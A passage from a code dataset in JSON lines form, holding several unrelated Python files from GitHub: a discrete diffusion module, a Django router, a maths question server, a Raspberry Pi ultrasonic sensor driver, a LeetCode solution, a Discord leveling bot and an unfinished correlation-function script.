torch.multinomial(c, 1).view(N, L)\n return x\n\n def add_noise(self, x_0, mask_generate, t):\n \"\"\"\n Args:\n x_0: (N, L)\n mask_generate: (N, L).\n t: (N,).\n Returns:\n c_t: Probability, (N, L, K).\n x_t: Sample, LongTensor, (N, L).\n \"\"\"\n N, L = x_0.size()\n K = self.num_classes\n c_0 = clampped_one_hot(x_0, num_classes=K).float() # (N, L, K).\n alpha_bar = self.var_sched.alpha_bars[t][:, None, None] # (N, 1, 1)\n c_noisy = (alpha_bar*c_0) + ( (1-alpha_bar)/K )\n c_t = torch.where(mask_generate[..., None].expand(N,L,K), c_noisy, c_0)\n x_t = self._sample(c_t)\n return c_t, x_t\n\n def posterior(self, x_t, x_0, t):\n \"\"\"\n Args:\n x_t: Category LongTensor (N, L) or Probability FloatTensor (N, L, K).\n x_0: Category LongTensor (N, L) or Probability FloatTensor (N, L, K).\n t: (N,).\n Returns:\n theta: Posterior probability at (t-1)-th step, (N, L, K).\n \"\"\"\n K = self.num_classes\n\n if x_t.dim() == 3:\n c_t = x_t # When x_t is probability distribution.\n else:\n c_t = clampped_one_hot(x_t, num_classes=K).float() # (N, L, K)\n\n if x_0.dim() == 3:\n c_0 = x_0 # When x_0 is probability distribution.\n else:\n c_0 = clampped_one_hot(x_0, num_classes=K).float() # (N, L, K)\n\n alpha = self.var_sched.alpha_bars[t][:, None, None] # (N, 1, 1)\n alpha_bar = self.var_sched.alpha_bars[t][:, None, None] # (N, 1, 1)\n\n theta = ((alpha*c_t) + (1-alpha)/K) * ((alpha_bar*c_0) + (1-alpha_bar)/K) # (N, L, K)\n theta = theta / (theta.sum(dim=-1, keepdim=True) + 1e-8)\n return theta\n\n def denoise(self, x_t, c_0_pred, mask_generate, t):\n \"\"\"\n Args:\n x_t: (N, L).\n c_0_pred: Normalized probability predicted by networks, (N, L, K).\n mask_generate: (N, L).\n t: (N,).\n Returns:\n post: Posterior probability at (t-1)-th step, (N, L, K).\n x_next: Sample at (t-1)-th step, LongTensor, (N, L).\n \"\"\"\n c_t = clampped_one_hot(x_t, num_classes=self.num_classes).float() # (N, L, K)\n post = self.posterior(c_t, c_0_pred, t=t) # (N, L, K)\n post = torch.where(mask_generate[..., None].expand(post.size()), post, c_t)\n x_next = self._sample(post)\n return post, x_next\n","repo_name":"yanliang3612/D3FG","sub_path":"models/diffusion/transition.py","file_name":"transition.py","file_ext":"py","file_size_in_byte":12596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10310779312","text":"from django.urls import include, path\nfrom rest_framework.routers import DefaultRouter\n\nfrom .views import TagViewSet\n\nrouter_v1 = DefaultRouter()\nrouter_v1.register(\n 'tags',\n TagViewSet,\n basename='ingredients'\n)\n\nurlpatterns = [\n path('', include(router_v1.urls)),\n]\n","repo_name":"YourKeysAreMine/foodgram-project-react","sub_path":"backend/tags/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25794093741","text":"import sys\nimport os\n\n\ncur_dir = os.path.split(os.path.abspath(__file__))[0]\nparent_dir = os.path.split(os.path.abspath(cur_dir))[0]\ngrandparent_dir = os.path.split(os.path.abspath(parent_dir))[0]\nquestions_dir = os.path.join(parent_dir, 'questions')\nsys.path.append(grandparent_dir)\n\n\nfrom maths.questions import relationships\nimport glob\nimport importlib\nimport random\n\n\n\ndef get_questions_dir():\n \"\"\"Return the directory that houses the questions.\n \"\"\"\n\n relationships_path = os.path.abspath(relationships.__file__)\n return os.path.split(relationships_path)[0]\n\n\ndef get_question_paths(questions_dir):\n \"\"\"Get all the module paths that have questions in them.\n \"\"\"\n\n pattern = os.path.join(questions_dir, r'*.py')\n\n module_paths = glob.glob(pattern)\n\n non_question_modules = ['__init__.py', 'relationships.py']\n\n question_modules = []\n for module_path in module_paths:\n module_name = os.path.split(module_path)[1]\n\n if module_name not in non_question_modules:\n question_modules.append(module_path)\n\n return question_modules\n\n\ndef import_question_modules(question_paths):\n \"\"\"Import and return a list of imported question modules.\n \"\"\"\n\n question_modules = []\n\n for question_path in question_paths:\n relative_path = os.path.relpath(question_path)\n module_name = os.path.splitext(os.path.split(relative_path)[1])[0]\n\n imported_module = importlib.import_module('.' + module_name, package='maths.questions')\n\n if hasattr(imported_module, 'question_not_complete'):\n continue\n\n question_modules.append(imported_module)\n\n return question_modules\n\n\ndef random_question():\n \"\"\"Serve a random question along with its solution.\n \"\"\"\n\n questions_dir = get_questions_dir()\n question_paths = get_question_paths(questions_dir)\n question_modules = import_question_modules(question_paths)\n\n choice = random.choice(question_modules)\n built_question = relationships.parse_structure(choice)[0]\n\n return {\n 'question': built_question.question_statement(),\n 'solution': built_question.solution_statement()\n }\n","repo_name":"nebffa/MathsExams","sub_path":"maths/api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"19319825890","text":"import RPi.GPIO as gpio\nfrom time import clock\nfrom threading import Thread\nfrom src import util\n\n# distance (in meters, technically) to use when no object is seen. This \n# should be outside the range in which the walker reacts in any way\nREALLY_FAR_AWAY = 49.69\n\nclass UltrasonicSensor: \n #Constructor Parameters:\n # * trigger_pin - number for the GPIO pin connected to TRIG on the sensor\n # * echo_pin - number for the GPIO pin connected to ECHO on the sensor\n # * offset - distance from sensor when walker hits an obstacle\n # \t^ can be zero\n # * max_dist - ignores objects farther than this (after offset applied)\n # * min_blip_freq - beep tempo at farthest distance\n # * max_blip_freq - beep tempo at nearest distance\n #Other ariables stored:\n # * distance - most recent measurement (in meters)\n # * timeout - time after which CANE should stop listening for US echo\n \n def __init__(self, trigger_pin, echo_pin, offset, max_dist, \n min_blip_freq, max_blip_freq):\n self.echo = echo_pin\n self.trigger = trigger_pin\n self.distance = 0 # should be >= 0\n self.dist_offset = offset\n self.dist_max = max_dist\n self.max_freq = max_blip_freq\n self.min_freq = min_blip_freq\n self.timeout = meters_to_seconds(10.0) #upper range 1m-4.5m, depending\n gpio.setmode(gpio.BCM)\n gpio.setup(self.trigger, gpio.OUT)\n gpio.setup(self.echo, gpio.IN, pull_up_down=gpio.PUD_DOWN)\n\n # send pulse to sensor's TRIG pin, starting the measurement process\n def ping(self):\n gpio.output(self.trigger, gpio.LOW)\n micros_wait(10)\n gpio.output(self.trigger, gpio.HIGH)\n micros_wait(10)\n gpio.output(self.trigger, gpio.LOW)\n \n # update the sensor's distance variable (see resources directory for \n # technical info)\n def find_distance(self):\n echo_time = self.measure_echo_pulse()\n \n self.distance = self.convert_time_to_distance(echo_time)\n \"\"\"util.log(str(self.echo)+' went high after '+str(wait_time)\n + ' with loop count '+str(wait_count)\n + '; measured time '+str(echo_time)+' with loop count '\n + str(echo_count)+'; raw distance '+str(self.distance)\n )\"\"\"\n \n # Measure the length of the echo pulse and return it, in seconds.\n def measure_echo_pulse(self):\n echo_time = 0.0 # Length of time, in seconds.\n\n # wait until the echo pin goes high\n # Multiply by 1000 to convert seconds to milliseconds.\n # TODO determine timeout outside of wait_for_edge\n error = gpio.wait_for_edge(self.echo, gpio.RISING, \n timeout=int(self.timeout*1000))\n \n startTime = clock()\n\n # wait until the echo pin goes low, storing the elapsed time\n error = gpio.wait_for_edge(self.echo, gpio.FALLING, \n timeout=int(self.timeout*1000))\n \n endTime = clock()\n\n # Calculate elapsed time.\n echo_time = endTime - startTime\n\n return echo_time\n\n # Convert the provided time (in seconds) to an output distance (in meters).\n def convert_time_to_distance(self, input_time):\n distance = 0.0 # Distance in meters\n\n # convert time to meters and adjust for offset\n distance = seconds_to_meters(input_time) - self.dist_offset\n if distance < 0.0: \n # found something but it's less than the minimum distance\n distance = 0.0\n\n return distance\n\n # return a new thread which runs find_distance()\n def get_distance_thread(self):\n return Thread(target=UltrasonicSensor.find_distance, args=(self,))\n \n # get the freqency at which the UI beeps should occur for this sensor\n def blips_freq(self):\n if self.distance < self.dist_max:\n return (self.max_freq - (self.max_freq - self.min_freq) \n / self.dist_max * self.distance)\n else:\n return 0.001\n\n\n\n# def micros_to_cm(micros):\n # return micros / 58.82\ndef seconds_to_meters(seconds):\n\treturn seconds * 170.145\ndef meters_to_seconds(meters):\n\treturn meters / 170.145\n\n# time.sleep() only works with input > 1 ms. This is inelegnt, but works with\n# the full accuracy of the operating system. Only use when time.sleep()\n# would be insufficient\ndef micros_wait(t):\n tEnd = clock() + t * 10**-6\n while clock() < tEnd:\n pass\n return\n\n# run a function repeatedly until it returns true, then return the time\n# it took to reach that state. If max_time (in seconds) is \ndef time_check( return_checker, max_time ):\n tStart = clock()\n tTimeout = tStart + max_time\n complete = False\n while not complete:\n complete = return_checker()\n if clock() >= tTimeout: \n return -1\n #print('sensor time', time() - tStart)\n return clock() - tStart\n \n","repo_name":"Robot-X-4969/CANE-walker","sub_path":"src/ultrasonic.py","file_name":"ultrasonic.py","file_ext":"py","file_size_in_byte":4928,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"31586820520","text":"#link to problem: https://leetcode.com/problems/maximum-subarray/\n\ndef maxSubArray(nums):\n for x in range(1,len(nums)):\n if nums[x-1] > 0:\n nums[x] += nums[x-1]\n return max(nums)\n\nprint(maxSubArray([4,-1,2,1])) #6\nprint(maxSubArray([1])) #1\nprint(maxSubArray([5,4,-1,7,8])) #23\n","repo_name":"GoGitThat/leetcodeProblems","sub_path":"easy/maximumSubarray.py","file_name":"maximumSubarray.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"13956937122","text":"import asyncio\nimport random\nfrom math import floor\nfrom typing import Optional\n\nimport aiosqlite\nimport discord\nfrom discord import app_commands\nfrom discord.ext import commands\n\nimport utils\nfrom utils.ids import GuildIDs, GuildNames, TGChannelIDs, TGLevelRoleIDs\nfrom utils.image import get_dominant_colour\n\n\nclass Levels(commands.Cog):\n \"\"\"This class handles the Leveling System of the Bot.\n We used to use Mee6, but now we use a custom system.\n \"\"\"\n\n def __init__(self, bot: commands.Bot) -> None:\n self.bot = bot\n\n def get_xp_till_next_level(self, current_level: int, current_xp: int) -> int:\n \"\"\"Gets you the amount of XP you need to level up to the next level.\n Taken from: https://github.com/Mee6/Mee6-documentation/blob/master/docs/levels_xp.md\n Since we used to use Mee6, we decided to keep the same formula.\n \"\"\"\n return max(\n 5 * (current_level**2) + (50 * current_level) + 100 - current_xp, 0\n )\n\n def get_xp_for_level(self, level: int) -> int:\n \"\"\"Gets you the amount of XP you need to reach a certain level.\"\"\"\n if level < 0:\n return 0\n\n return sum(self.get_xp_till_next_level(i, 0) for i in range(level))\n\n def get_level_from_xp(self, xp: int) -> int:\n \"\"\"Gets you the level you are at from a certain amount of XP.\"\"\"\n level = 0\n while self.get_xp_for_level(level) <= xp:\n level += 1\n return max(level - 1, 0)\n\n async def create_new_profile(self, user: discord.User) -> None:\n \"\"\"Creates a profile for a user.\"\"\"\n async with aiosqlite.connect(\"./db/database.db\") as db:\n matching_profile = await db.execute_fetchall(\n \"\"\"SELECT * FROM level WHERE id = :id\"\"\",\n {\"id\": user.id},\n )\n\n if len(matching_profile) != 0:\n return\n\n await db.execute(\n \"\"\"INSERT INTO level VALUES (:id, :level, :xp, :messages)\"\"\",\n {\n \"id\": user.id,\n \"level\": 0,\n \"xp\": 0,\n \"messages\": 0,\n },\n )\n await db.commit()\n\n async def add_xp(self, user_id: int, xp_gained: int) -> tuple[int, int, int]:\n \"\"\"Adds XP to a user and returns the old level, new level and new XP.\"\"\"\n async with aiosqlite.connect(\"./db/database.db\") as db:\n matching_profile = await db.execute_fetchall(\n \"\"\"SELECT * FROM level WHERE id = :id\"\"\",\n {\"id\": user_id},\n )\n\n old_level = matching_profile[0][1]\n old_xp = matching_profile[0][2]\n\n new_xp = old_xp + xp_gained\n new_level = self.get_level_from_xp(new_xp)\n\n await db.execute(\n \"\"\"UPDATE level SET xp = :new_xp, messages = messages + 1, level = :new_level WHERE id = :id\"\"\",\n {\n \"new_xp\": new_xp,\n \"new_level\": new_level,\n \"id\": user_id,\n },\n )\n\n await db.commit()\n\n return (old_level, new_level, new_xp)\n\n def get_all_level_roles(self, guild: discord.Guild) -> list[discord.Role]:\n defaultrole = discord.utils.get(guild.roles, id=TGLevelRoleIDs.RECRUIT_ROLE)\n level10 = discord.utils.get(guild.roles, id=TGLevelRoleIDs.LEVEL_10_ROLE)\n level25 = discord.utils.get(guild.roles, id=TGLevelRoleIDs.LEVEL_25_ROLE)\n level50 = discord.utils.get(guild.roles, id=TGLevelRoleIDs.LEVEL_50_ROLE)\n level75 = discord.utils.get(guild.roles, id=TGLevelRoleIDs.LEVEL_75_ROLE)\n level100 = discord.utils.get(guild.roles, id=TGLevelRoleIDs.LEVEL_100_ROLE)\n\n return [defaultrole, level10, level25, level50, level75, level100]\n\n async def assign_level_role(\n self,\n member: discord.Member,\n levelroles: list[discord.Role],\n assign_role: discord.Role,\n ) -> discord.Role:\n \"\"\"Removes every other level role and assigns the correct one.\"\"\"\n\n roles_to_remove = [role for role in levelroles if role is not assign_role]\n await member.remove_roles(*roles_to_remove)\n await member.add_roles(assign_role)\n return assign_role\n\n async def update_level_role(\n self, user: discord.User, level: int, guild: discord.Guild\n ) -> Optional[discord.Role]:\n \"\"\"Assigns you a new role depending on your level and removes all of the other ones.\n Returns the new role.\n \"\"\"\n rolegiven = None\n\n levelroles = self.get_all_level_roles(guild)\n\n [defaultrole, level10, level25, level50, level75, level100] = levelroles\n\n try:\n member = await guild.fetch_member(user.id)\n except discord.NotFound:\n return\n\n if level >= 100:\n if level100 not in member.roles:\n rolegiven = await self.assign_level_role(member, levelroles, level100)\n\n elif level >= 75:\n if level75 not in member.roles:\n rolegiven = await self.assign_level_role(member, levelroles, level75)\n\n elif level >= 50:\n if level50 not in member.roles:\n rolegiven = await self.assign_level_role(member, levelroles, level50)\n\n elif level >= 25:\n if level25 not in member.roles:\n rolegiven = await self.assign_level_role(member, levelroles, level25)\n\n elif level >= 10:\n if level10 not in member.roles:\n rolegiven = await self.assign_level_role(member, levelroles, level10)\n\n else:\n if defaultrole not in member.roles:\n rolegiven = await self.assign_level_role(\n member, levelroles, defaultrole\n )\n\n return rolegiven\n\n def get_next_role(\n self, current_xp: int, current_level: int, guild: discord.Guild\n ) -> tuple[int, int, Optional[discord.Role]]:\n \"\"\"Gets you the next role, if there is any, plus the levels and XP needed to get there.\"\"\"\n levelroles = self.get_all_level_roles(guild)\n\n [_, level10, level25, level50, level75, level100] = levelroles\n\n if current_level >= 100:\n return (0, 0, None)\n\n if current_level >= 75:\n return (\n 100 - current_level,\n self.get_xp_for_level(100),\n level100,\n )\n\n if current_level >= 50:\n return (75 - current_level, self.get_xp_for_level(75), level75)\n\n if current_level >= 25:\n return (50 - current_level, self.get_xp_for_level(50), level50)\n\n if current_level >= 10:\n return (25 - current_level, self.get_xp_for_level(25), level25)\n\n return (10 - current_level, self.get_xp_for_level(10), level10)\n\n @commands.Cog.listener()\n async def on_message(self, message: discord.Message) -> None:\n if message.author.bot:\n return\n\n if not message.guild:\n return\n\n if message.guild.id != GuildIDs.TRAINING_GROUNDS:\n return\n\n if message.channel.id in TGChannelIDs.BLACKLISTED_CHANNELS:\n return\n\n if self.bot.recent_messages.get(message.author.id) is not None:\n return\n\n if message.is_system():\n return\n\n # Doesn't really matter what we set it to, as long as it's not None.\n self.bot.recent_messages[message.author.id] = True\n\n xp_amount = random.randint(15, 25)\n\n await self.create_new_profile(message.author)\n\n (old_level, new_level, _) = await self.add_xp(message.author.id, xp_amount)\n\n if old_level != new_level:\n role = await self.update_level_role(\n message.author, new_level, message.guild\n )\n\n if role:\n sent_message = f\"Congrats {message.author.mention}! You leveled up to level {new_level}! You gained the {role.name} role!\"\n else:\n sent_message = f\"Congrats {message.author.mention}! You leveled up to level {new_level}!\"\n\n await message.channel.send(sent_message)\n\n # We wait 30 seconds before removing the user from the recent_messages dict.\n # This is to prevent the user from spamming messages and getting a lot of xp.\n # Maybe replace this with a loop that runs every X seconds and removes all users from the dict?\n await asyncio.sleep(30)\n\n try:\n self.bot.recent_messages.pop(message.author.id)\n except KeyError:\n pass\n\n @commands.hybrid_group()\n @app_commands.guilds(*GuildIDs.ALL_GUILDS)\n @app_commands.default_permissions(administrator=True)\n @utils.check.is_moderator()\n async def xp(self, ctx: commands.Context):\n \"\"\"Lists the xp commands.\"\"\"\n if ctx.invoked_subcommand:\n return\n\n embed = discord.Embed(\n title=\"Available subcommands:\",\n description=f\"`{ctx.prefix}xp add @user <amount>`\\n\"\n f\"`{ctx.prefix}xp remove @user <amount>`\\n\",\n colour=self.bot.colour,\n )\n embed.set_thumbnail(url=self.bot.user.display_avatar.url)\n await ctx.send(embed=embed)\n\n @xp.command(name=\"add\")\n @app_commands.guilds(*GuildIDs.ALL_GUILDS)\n @app_commands.describe(\n user=\"The user to add the xp to.\", amount=\"The amount of xp to add to the user.\"\n )\n @app_commands.default_permissions(administrator=True)\n @utils.check.is_moderator()\n async def xp_add(\n self, ctx: commands.Context, user: discord.User, amount: int\n ) -> None:\n \"\"\"Adds xp to a user.\"\"\"\n\n if amount < 0:\n await ctx.send(\"To remove XP, please use the xp remove command.\")\n return\n\n await self.create_new_profile(user)\n\n (old_level, new_level, new_xp) = await self.add_xp(user.id, amount)\n\n if old_level != new_level:\n await self.update_level_role(user, new_level, ctx.guild)\n\n await ctx.send(\n f\"Added {amount}XP to {user.mention}. They are now level {new_level} with {new_xp}XP.\"\n )\n\n @xp.command(name=\"remove\")\n @app_commands.guilds(*GuildIDs.ALL_GUILDS)\n @app_commands.describe(\n user=\"The user to remove the xp from.\",\n amount=\"The amount of xp to remove from the user.\",\n )\n @app_commands.default_permissions(administrator=True)\n @utils.check.is_moderator()\n async def xp_remove(\n self, ctx: commands.Context, user: discord.User, amount: int\n ) -> None:\n \"\"\"Removes xp from a user.\"\"\"\n\n if amount < 0:\n await ctx.send(\"To add XP, please use the xp add command.\")\n return\n\n await self.create_new_profile(user)\n\n (old_level, new_level, new_xp) = await self.add_xp(user.id, -amount)\n\n if old_level != new_level:\n await self.update_level_role(user, new_level, ctx.guild)\n\n await ctx.send(\n f\"Removed {amount}XP from {user.mention}. They are now level {new_level} with {new_xp}XP.\"\n )\n\n @commands.hybrid_command()\n @app_commands.guilds(*GuildIDs.ALL_GUILDS)\n async def rank(self, ctx: commands.Context, user: discord.User = None) -> None:\n \"\"\"Shows your level and xp, or the level and xp of another user.\"\"\"\n if user is None:\n user = ctx.author\n\n if user.bot:\n await ctx.send(\"This command cannot be used on bots.\")\n return\n\n if not ctx.guild:\n await ctx.send(\n f\"This command can only be used in the {GuildNames.TRAINING_GROUNDS}\"\n )\n return\n\n if ctx.guild.id != GuildIDs.TRAINING_GROUNDS:\n await ctx.send(\n f\"This command can only be used in the {GuildNames.TRAINING_GROUNDS}\"\n )\n return\n\n await ctx.typing()\n\n colour = await get_dominant_colour(user.display_avatar)\n\n embed = discord.Embed(\n title=f\"Level statistics for {str(user)}\",\n colour=colour,\n )\n\n await self.create_new_profile(user)\n\n async with aiosqlite.connect(\"./db/database.db\") as db:\n matching_profile = await db.execute_fetchall(\n \"\"\"SELECT * FROM level WHERE id = :id\"\"\",\n {\"id\": user.id},\n )\n\n level = matching_profile[0][1]\n xp = matching_profile[0][2]\n messages = matching_profile[0][3]\n\n leaderboard_rank = await db.execute_fetchall(\n \"\"\"SELECT row_number() OVER (ORDER BY xp DESC) AS rank, id, level, xp, messages FROM level\"\"\",\n )\n rank = next((i[0] for i in leaderboard_rank if i[1] == user.id), 0)\n next_user = next((i for i in leaderboard_rank if i[0] == rank + 1), None)\n prev_user = next((i for i in leaderboard_rank if i[0] == rank - 1), None)\n\n await db.commit()\n\n xp_progress = xp - self.get_xp_for_level(level)\n xp_needed = self.get_xp_for_level(level + 1) - self.get_xp_for_level(level)\n\n [next_role_level, next_role_xp, next_role] = self.get_next_role(\n xp, level, ctx.guild\n )\n\n percent_next = round((xp_progress / xp_needed) * 100, 2)\n # I wanted to do this with 20 characters, but it cuts off on mobile at 17.\n progress_bar_next = (\"█\" * floor(percent_next / 6.25)).ljust(16, \"░\")\n\n percent_level = round((xp / next_role_xp) * 100, 2)\n progress_bar_level = (\"█\" * floor(percent_level / 6.25)).ljust(16, \"░\")\n\n embed.add_field(name=\"Level\", value=f\"**{level}**\", inline=True)\n embed.add_field(\n name=\"Rank\",\n value=f\"**#{rank}**\",\n inline=True,\n )\n embed.add_field(name=\"XP\", value=f\"**{xp:,}**\", inline=True)\n embed.add_field(\n name=\"Progress to next level\",\n value=f\"{xp_progress:,}XP/{xp_needed:,}XP *({percent_next}%)*\\n{progress_bar_next}\",\n inline=False,\n )\n if next_role:\n embed.add_field(\n name=\"Progress to next role\",\n value=f\"{next_role.mention} *({next_role_level} Level needed)*\\n\"\n f\"{xp:,}XP/{next_role_xp:,}XP *({percent_level}%)*\\n{progress_bar_level}\",\n inline=False,\n )\n else:\n embed.add_field(\n name=\"Progress to next role\",\n value=\"No more roles to unlock!\",\n inline=False,\n )\n\n if prev_user is not None:\n prev_member = self.bot.get_user(prev_user[1])\n if prev_member is None:\n try:\n prev_member = await self.bot.fetch_user(prev_user[1])\n except (discord.NotFound, discord.HTTPException):\n prev_member = \"Unknown User\"\n\n embed.add_field(\n name=\"User above\",\n value=f\"**{str(prev_member)}** - Level {prev_user[2]} *({prev_user[3]:,}XP)*\\n{(prev_user[3] - xp):,}XP behind\",\n inline=False,\n )\n\n if next_user is not None:\n next_member = self.bot.get_user(next_user[1])\n if next_member is None:\n try:\n next_member = await self.bot.fetch_user(next_user[1])\n except (discord.NotFound, discord.HTTPException):\n next_member = \"Unknown User\"\n\n embed.add_field(\n name=\"User below\",\n value=f\"**{str(next_member)}** - Level {next_user[2]} *({next_user[3]:,}XP)*\\n{(xp - next_user[3]):,}XP ahead\",\n inline=False,\n )\n\n embed.add_field(\n name=\"Messages sent\",\n value=f\"{messages:,}\",\n inline=False,\n )\n\n embed.set_thumbnail(url=user.display_avatar.url)\n await ctx.send(embed=embed)\n\n @commands.hybrid_command()\n @app_commands.guilds(*GuildIDs.ALL_GUILDS)\n async def levels(self, ctx: commands.Context) -> None:\n \"\"\"Shows the leaderboard for levels.\"\"\"\n\n if not ctx.guild:\n await ctx.send(\n f\"This command can only be used in the {GuildNames.TRAINING_GROUNDS}\"\n )\n return\n\n if ctx.guild.id != GuildIDs.TRAINING_GROUNDS:\n await ctx.send(\n f\"This command can only be used in the {GuildNames.TRAINING_GROUNDS}\"\n )\n return\n\n await ctx.typing()\n\n embed = discord.Embed(\n title=f\"Level leaderboard of {GuildNames.TRAINING_GROUNDS}\",\n colour=self.bot.colour,\n )\n\n async with aiosqlite.connect(\"./db/database.db\") as db:\n leaderboard = await db.execute_fetchall(\n \"\"\"SELECT row_number() OVER (ORDER BY xp DESC) AS rank, id, level, xp, messages FROM level\"\"\",\n )\n\n total_messages = await db.execute_fetchall(\n \"\"\"SELECT SUM(messages) FROM level\"\"\",\n )\n\n total_xp = await db.execute_fetchall(\n \"\"\"SELECT SUM(xp) FROM level\"\"\",\n )\n\n await db.commit()\n\n for rank, user_id, level, xp, messages in leaderboard[:25]:\n user = self.bot.get_user(user_id)\n if user is None:\n user = await self.bot.fetch_user(user_id)\n\n embed.add_field(\n name=f\"#{rank} - {str(user)}\",\n value=f\"Level {level} - {xp:,}XP ({messages:,} messages)\",\n inline=False,\n )\n\n embed.set_footer(\n text=f\"Total server stats: {total_xp[0][0]:,}XP - {total_messages[0][0]:,} messages\",\n )\n\n embed.set_thumbnail(url=ctx.guild.icon.url)\n\n await ctx.send(embed=embed)\n\n @xp_add.error\n async def xp_add_error(\n self, ctx: commands.Context, error: commands.CommandError\n ) -> None:\n if isinstance(error, commands.BadArgument):\n await ctx.send(\"Please provide a valid amount of XP to add.\")\n\n @xp_remove.error\n async def xp_remove_error(\n self, ctx: commands.Context, error: commands.CommandError\n ) -> None:\n if isinstance(error, commands.BadArgument):\n await ctx.send(\"Please provide a valid amount of XP to remove.\")\n\n\nasync def setup(bot: commands.Bot) -> None:\n await bot.add_cog(Levels(bot))\n print(\"Levels cog loaded\")\n","repo_name":"SSBUTrainingGrounds/Tabuu-3.0","sub_path":"cogs/levels.py","file_name":"levels.py","file_ext":"py","file_size_in_byte":18443,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"16978952982","text":"## Script to compute estimate of the correlation function(s) xi(r,mu) for an entire survey via the DD/RR-1 estimator for one/two sets of tracer particles (galaxies).\n## This assumes a periodic simulation, with the random RR counts computed analytically.\n## Mu (RSD angle) is measured from the Z-axis.\n## If two sets of galaxies are provided, the code will automatically compute xi_11 xi_12 and xi_22, else only xi_11 will be computed.\n\nimport sys\nimport numpy as np\n\n# PARAMETERS\nif len(sys.argv)!=8:\n if len(sys.argv)!=9:\n print(\"Usage: python xi_estimator_periodic.py {GALAXY_FILE} {RADIAL_BIN_FILE} {BOXSIZE} {MU_MAX} {N_MU_BINS} {NTHREADS} {OUTPUT_DIR} [{GALAXY_FILE_2}]\")\n sys.exit(1)\nDname = str(sys.argv[1])\nbinfile = str(sys.argv[2])\nboxsize = float(sys.argv[3])\nmu_max = float(sys.argv[4])\nnmu_bins = int(sys.argv[5])\nnthreads = int(sys.argv[6])\noutdir=str(sys.argv[7])\n\nif len(sys.argv)==9:\n multifield = True\n Dname2 = str(sys.argv[8])\nelse:\n multifield = False\n\n## First read in weights and positions:\ndtype = np.double\n\nprint(\"Counting lines in galaxy file\")\ntotal_lines=0\nfor n, line in enumerate(open(Dname, 'r')):\n total_lines+=1\n\ndX,dY,dZ,dW=[np.zeros(total_lines) for _ in range(4)]\n\nprint(\"Reading in galaxy data\");\nfor n, line in enumerate(open(Dname, 'r')):\n if n%1000000==0:\n print(\"Reading line %d of %d\" %(n,total_lines))\n split_line=np.array(line.split(), dtype=float)\n dX[n]=split_line[0];\n dY[n]=split_line[1];\n dZ[n]=split_line[2];\n if len(split_line)>3:\n dW[n]=split_line[3];\n else:\n dW[n]=1.\n\nN_gal = len(dX) # number of particles\n\nprint(\"Number of galaxy particles: %.1e\"%N_gal)\n\n## Check for periodicity\nxrange = max(dX)-min(dX)\nyrange = max(dY)-min(dY)\nzrange = max(dZ)-min(dZ)\n\nassert(np.abs(xrange-boxsize)/boxsize<0.001),'Data is not periodic! X-range is %.2e compared to boxsize %.2e'%(xrange,boxsize)\nassert(np.abs(yrange-boxsize)/boxsize<0.001),'Data is not periodic! Y-range is %.2e compared to boxsize %.2e'%(yrange,boxsize)\nassert(np.abs(zrange-boxsize)/boxsize<0.001),'Data is not periodic! Z-range is %.2e compared to boxsize %.2e'%(zrange,boxsize)\n\nif multifield:\n\n print(\"Counting lines in galaxy file 2\")\n total_lines2=0\n for n, line in enumerate(open(Dname2,'r')):\n total_lines2+=1\n\n dX2,dY2,dZ2,dW2=[np.zeros(total_lines2) for _ in range(4)]\n\n print(\"Reading in galaxy data for galaxy 2\");\n for n, line in enumerate(open(Dname2, 'r')):\n if n%1000000==0:\n print(\"Reading line %d of %d\" %(n,total_lines2))\n split_line=np.array(line.split(), dtype=float)\n dX2[n]=split_line[0];\n dY2[n]=split_line[1];\n dZ2[n]=split_line[2];\n dW2[n]=split_line[3];\n\n N_gal2 = len(dX2) # number of particles\n print(\"Number of galaxy particles in second set: %.1e\"%N_gal2)\n\n ## Check for periodicity\n xrange = max(dX2)-min(dX2)\n yrange = max(dY2)-min(dY2)\n zrange = max(dZ2)-min(dZ2)\n\n assert(np.abs(xrange-boxsize)/boxsize<0.001),'Data set 2 is not periodic! X-range is %.2e compared to boxsize %.2e'%(xrange,boxsize)\n assert(np.abs(yrange-boxsize)/boxsize<0.001),'Data set 2 is not periodic! Y-range is %.2e compared to boxsize %.2e'%(yrange,boxsize)\n assert(np.abs(zrange-boxsize)/boxsize<0.001),'Data set 2 is not periodic! Z-range is %.2e compared to boxsize %.2e'%(zrange,boxsize)\n\n## Determine number of radial bins in binning file:\nprint(\"Counting lines in binfile\");\nwith open(binfile) as f:\n for i, l in enumerate(f):\n pass\nnrbins = i + 1\nall_bins = np.loadtxt(binfile)\nmean_bins=0.5*(all_bins[:,0]+all_bins[:,1])\nif all_bins[0,0]>2:\n raise Exception(\"Radial binfile should extend close to zero\")\nprint('%s radial bins are used in this file.' %nrbins)\n\nprint(\"Using periodic input data\");\nfrom Corrfunc.theory.DDsmu import DDsmu\n\n# Compute RR counts analytically\nRR_counts = 4.*np.pi/3.*(all_bins[:,1]**3-all_bins[:,0]**3)/boxsize**3*mu_max/nmu_bins\n\nimport time\ninit = time.time()\n\n# Now compute DD counts\nprint(\"Computing DD pair counts\")\ntmpDD=DDsmu(1,nthreads,binfile,mu_max,nmu_bins,dX,dY,dZ,weights1=dW,weight_type='pair_product',verbose=True,periodic=True)\nDD_counts = tmpDD[:]['npairs']*tmpDD[:]['weightavg']\nDD_counts/=np.sum(dW)**2.\nprint(\"Finished after %d seconds\"%(time.time()-init))\n\n# Now use CF estimator:\nxi_reshape = DD_counts.reshape(nrbins,nmu_bins)/RR_counts.reshape(nrbins,1) - 1.\n\nif multifield:\n # Compute cross fields\n init = time.time()\n print(\"Computing DD pair counts for cross pair counts\")\n tmpDD12=DDsmu(0,nthreads,binfile,mu_max,nmu_bins,dX,dY,dZ,weights1=dW,weight_type='pair_product',\n X2=dX2,Y2=dY2,Z2=dZ2,weights2=dW2,\n verbose=True,periodic=True)\n DD12_counts = 